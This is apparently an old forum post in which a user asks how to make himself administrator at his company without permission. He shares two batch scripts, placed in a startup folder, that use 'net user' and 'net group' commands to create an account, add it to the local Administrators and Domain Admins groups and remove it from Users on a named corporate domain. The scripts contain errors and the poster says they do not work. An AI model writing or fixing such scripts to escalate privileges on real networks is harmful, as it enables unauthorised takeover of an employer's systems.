PDA

View Full Version : Admin


soldier
08-16-2006, 12:04 PM
So. Here I am, still trying to get myself to be admin at this company ... Trying a lil sum here but it not working.. help?

echo off
Net user %alngjal1% pass /active /atlanticlngtt.corp /add
Net local group Administrators %alngjal1% /add
Net group "Domain Admins" %alngjal1% /add /atlanticlngtt.corp
Net group "Users" %alngjal1% /delete /atlanticlngtt.corp

Saved as .bat file and placed in the startup folder. Originally though I wanted to add it in the startup folder for all users but as normal, access was denied.. Originally made..

echo off
Net user %user% pass /active /domain /add
Net local group Administrators %user% /add
Net group "Domain Admins" %user% /add /domain
Net group "Users" %user% /delete /domain

Can I get some assistance? Para? Dinesh? Scar?